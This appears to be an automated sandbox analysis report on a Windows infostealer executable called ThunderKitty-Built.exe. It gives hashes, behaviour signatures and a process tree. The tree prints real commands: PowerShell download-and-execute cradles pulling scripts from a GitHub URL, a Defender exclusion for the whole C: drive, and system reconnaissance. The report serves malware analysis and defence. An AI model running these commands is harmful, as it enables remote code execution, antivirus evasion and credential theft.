Overview

overview

9

Static

static

3

ThunderKit...lt.exe

windows7-x64

1

ThunderKit...lt.exe

windows10-1703-x64

9

ThunderKit...lt.exe

windows10-2004-x64

9

ThunderKit...lt.exe

windows11-21h2-x64

9

Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10/07/2024, 19:20

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ThunderKitty-Built.exe

  • Size

    9.1MB

  • MD5

    11465eca8be1b364fbbda360d437c855

  • SHA1

    25c42bfe635ccf389e2de5e5c194ee6f3794d325

  • SHA256

    7d02de7a3e4f7b6d01b58057b4488beecf4e8123f6d24bf0156138e4bc31594a

  • SHA512

    5838c8f3638713b1718e821c717817e08392766348ad5adc407c62ecb03a11b3c83162b43f377a26d4cb03409523410029e4e91cbb6ab94c26e806bf14de595d

  • SSDEEP

    98304:ViWVwpItpo8Bv/3mSsaixt1qUkFpq9EGyakRUG:SpItpBvqZWpjP4G

Score
9/10
evasionexecutionpersistenceprivilege_escalationspywarestealer

Malware Config

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ThunderKitty-Built.exe
    "C:\Users\Admin\AppData\Local\Temp\ThunderKitty-Built.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4472
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3352
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vijpfebr\vijpfebr.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:856
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD0AE.tmp" "c:\Users\Admin\AppData\Local\Temp\vijpfebr\CSCB88E8B7E5B6481E84EFB5D54B5BEB4A.TMP"
          4⤵
            PID:4100
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" wlan show profiles
          3⤵
          • Event Triggered Execution: Netsh Helper DLL
          PID:512
        • C:\Windows\system32\net.exe
          "C:\Windows\system32\net.exe" localgroup administrators
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2956
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 localgroup administrators
            4⤵
              PID:4968
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
            3⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            PID:4084
          • C:\Windows\system32\whoami.exe
            "C:\Windows\system32\whoami.exe" /all
            3⤵
              PID:2780
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" user
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4588
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 user
                4⤵
                  PID:4732
              • C:\Windows\system32\ipconfig.exe
                "C:\Windows\system32\ipconfig.exe" /displaydns
                3⤵
                • Gathers network information
                PID:2000
              • C:\Windows\system32\net.exe
                "C:\Windows\system32\net.exe" localgroup
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3988
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 localgroup
                  4⤵
                    PID:4300
                • C:\Windows\System32\Wbem\WMIC.exe
                  "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
                  3⤵
                    PID:968
                  • C:\Windows\system32\NETSTAT.EXE
                    "C:\Windows\system32\NETSTAT.EXE" -ano
                    3⤵
                    • Gathers network information
                    PID:4028
                  • C:\Windows\System32\Wbem\WMIC.exe
                    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
                    3⤵
                      PID:4336
                    • C:\Windows\system32\ipconfig.exe
                      "C:\Windows\system32\ipconfig.exe" /all
                      3⤵
                      • Gathers network information
                      PID:3712
                    • C:\Windows\system32\ROUTE.EXE
                      "C:\Windows\system32\ROUTE.EXE" print
                      3⤵
                        PID:3436
                      • C:\Windows\system32\ARP.EXE
                        "C:\Windows\system32\ARP.EXE" -a
                        3⤵
                          PID:1220
                        • C:\Windows\system32\netsh.exe
                          "C:\Windows\system32\netsh.exe" wlan show profile
                          3⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          PID:5068
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -C "Add-MpPreference -ExclusionPath 'C:'"
                        2⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2796
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
                        2⤵
                        • Blocklisted process makes network request
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4188

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                      Filesize

                      2KB

                      MD5

                      d85ba6ff808d9e5444a4b369f5bc2730

                      SHA1

                      31aa9d96590fff6981b315e0b391b575e4c0804a

                      SHA256

                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                      SHA512

                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      Filesize

                      1KB

                      MD5

                      f54739f39b26bcb477df3cc1d938c8de

                      SHA1

                      ce32f9dd56d756b9026ac33fe104b975118cb70f

                      SHA256

                      8ad9052ea2d364855cbf3731f4b5267c633205d2903289e18a21787b57b51312

                      SHA512

                      35e61cc96c228346a2b586970a55f8b686c7fe99eef86bcc63f00ccd38318a750bc6dd79d56d9daa79746ac67fc6153d57c1b4feb8c002fefe8dbd5a0fe57968

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      Filesize

                      1KB

                      MD5

                      fe556934f6b14e7f45b76a64dca05876

                      SHA1

                      4423bddb5a533251e86716a95e1a6e3029d7d362

                      SHA256

                      3f6175dafa5968202fd6e28f97b8020c99abddf2c92705ae1e85eef9c972502c

                      SHA512

                      0bdb67684166517abaf3b7de1a3282d6f702330665e807b1ccc5ad410f1a48ffdc0c837145ced787f53194850ce08f4982b4ded300606b7f9a546f3f3eb387be

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\RESD0AE.tmp
                      Filesize

                      1KB

                      MD5

                      88bcb80cc060706af18232c5bd63a8cb

                      SHA1

                      a265e6298e3e85cf5e25e29d84ac30b593a1854b

                      SHA256

                      5a35b8ddb8d68527e23b8697b882d63028e094c3ae8701fa7cd883cc093900ca

                      SHA512

                      7e1a2c48817276493725b99aaa41433ed38dab9aaaea4b173ae6964c65928dad0ec1aed2d2e2ca7af21552b364cb7b4800c98f72c398e16966892a1c5fdbff32

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt
                      Filesize

                      21KB

                      MD5

                      8e2ea6d3c59f272c517a63f408f2e1d3

                      SHA1

                      5cd31b57f7148e8ce1792d19f402051648aac468

                      SHA256

                      0d3d0eb12407d8317cbe47f12da60acd363e3d35699250e5cd80d93b706a6d12

                      SHA512

                      194b816afa8ad68ebb943a08d4eb66c3b41f4bfba155d8a3d32fe4eead1d32aad1c86bd6288011e87e605b8702ca8470b805233e09a311a33f99a4324473c936

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bnj3znv2.rr3.ps1
                      Filesize

                      60B

                      MD5

                      d17fe0a3f47be24a6453e9ef58c94641

                      SHA1

                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                      SHA256

                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                      SHA512

                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\vijpfebr\vijpfebr.dll
                      Filesize

                      4KB

                      MD5

                      e704008d525d9396fed9a8d7825f0dd4

                      SHA1

                      a1c7af567a21fc8dea766edc9c6ef48dc41cf67c

                      SHA256

                      d57048d9ba8c3dd4cd883aae4eef1cfca1b0682adc558c5616273c7b31118151

                      SHA512

                      f10d1f2d9f9dffe37a94b7be510025533258a5b90173d32bb834f67b98139cf4d9ae2ecf3b4c98907bcf1745b80064e5ab410724b69103d0582c55558a6d5de0

                      Download Submit

                    • \??\c:\Users\Admin\AppData\Local\Temp\vijpfebr\CSCB88E8B7E5B6481E84EFB5D54B5BEB4A.TMP
                      Filesize

                      652B

                      MD5

                      bca3736567b5f763da8b79087ec9f8dc

                      SHA1

                      1e21a8ac485341470c3b9a6d2dadfa1a5c8e267e

                      SHA256

                      64883b614241d5c30173a5009550c8b82a57b118b5ed5e707311658184aaad75

                      SHA512

                      ecee1e957d163b12023039e331ea03faf1b780838bd7bc4f0dd4b7d74dec44572e67431378c7fb1492ade3c7613389c01851fc1ca9c26d5c376319f7ec7d9d6f

                      Download Submit

                    • \??\c:\Users\Admin\AppData\Local\Temp\vijpfebr\vijpfebr.0.cs
                      Filesize

                      1KB

                      MD5

                      8a1e7edb2117ec5dde9a07016905923b

                      SHA1

                      0155dbeeb16333e2eaa767b0209750efee56f47f

                      SHA256

                      c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

                      SHA512

                      4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

                      Download Submit

                    • \??\c:\Users\Admin\AppData\Local\Temp\vijpfebr\vijpfebr.cmdline
                      Filesize

                      369B

                      MD5

                      9aa828a32351da791b88d3eb1109f4f2

                      SHA1

                      50adca7939beb30fc45c9355a3d44daf190225d3

                      SHA256

                      0df4d71b8ed36bef75e8a9f5a1887b478dd2269281627a84278c9915c7853cb8

                      SHA512

                      f94e07b3fc16649895fbd042265e0bb19f04ecd2ed18a3af635d58102db02d071bca2244683f07e971ca90e838cf4ec729dac6837cb4b06761baf13fd83cef4a

                      Download Submit

                    • memory/2796-12-0x00007FFBBCDA0000-0x00007FFBBD861000-memory.dmp

                      Filesize

                      10.8MB

                      Download

                    • memory/2796-6-0x00007FFBBCDA0000-0x00007FFBBD861000-memory.dmp

                      Filesize

                      10.8MB

                      Download

                    • memory/2796-11-0x000002133EF50000-0x000002133EF72000-memory.dmp

                      Filesize

                      136KB

                      Download

                    • memory/2796-0-0x00007FFBBCDA3000-0x00007FFBBCDA5000-memory.dmp

                      Filesize

                      8KB

                      Download

                    • memory/2796-38-0x000002133EFB0000-0x000002133F1CC000-memory.dmp

                      Filesize

                      2.1MB

                      Download

                    • memory/2796-39-0x00007FFBBCDA0000-0x00007FFBBD861000-memory.dmp

                      Filesize

                      10.8MB

                      Download

                    • memory/3352-35-0x00007FFBBCDA0000-0x00007FFBBD861000-memory.dmp

                      Filesize

                      10.8MB

                      Download

                    • memory/3352-65-0x0000024FBE3F0000-0x0000024FBE41A000-memory.dmp

                      Filesize

                      168KB

                      Download

                    • memory/3352-101-0x00007FFBBCDA0000-0x00007FFBBD861000-memory.dmp

                      Filesize

                      10.8MB

                      Download

                    • memory/3352-33-0x00007FFBBCDA0000-0x00007FFBBD861000-memory.dmp

                      Filesize

                      10.8MB

                      Download

                    • memory/3352-32-0x00007FFBBCDA0000-0x00007FFBBD861000-memory.dmp

                      Filesize

                      10.8MB

                      Download

                    • memory/3352-61-0x0000024FBDC20000-0x0000024FBDC28000-memory.dmp

                      Filesize

                      32KB

                      Download

                    • memory/3352-100-0x0000024FBDC50000-0x0000024FBDE6C000-memory.dmp

                      Filesize

                      2.1MB

                      Download

                    • memory/3352-41-0x0000024FBEB20000-0x0000024FBF2C6000-memory.dmp

                      Filesize

                      7.6MB

                      Download

                    • memory/3352-66-0x0000024FBE3F0000-0x0000024FBE414000-memory.dmp

                      Filesize

                      144KB

                      Download

                    • memory/4188-34-0x00007FFBBCDA0000-0x00007FFBBD861000-memory.dmp

                      Filesize

                      10.8MB

                      Download

                    • memory/4188-52-0x000001AF784C0000-0x000001AF786DC000-memory.dmp

                      Filesize

                      2.1MB

                      Download

                    • memory/4188-40-0x00007FFBBCDA0000-0x00007FFBBD861000-memory.dmp

                      Filesize

                      10.8MB

                      Download

                    • memory/4188-31-0x00007FFBBCDA0000-0x00007FFBBD861000-memory.dmp

                      Filesize

                      10.8MB

                      Download

                    • memory/4188-53-0x00007FFBBCDA0000-0x00007FFBBD861000-memory.dmp

                      Filesize

                      10.8MB

                      Download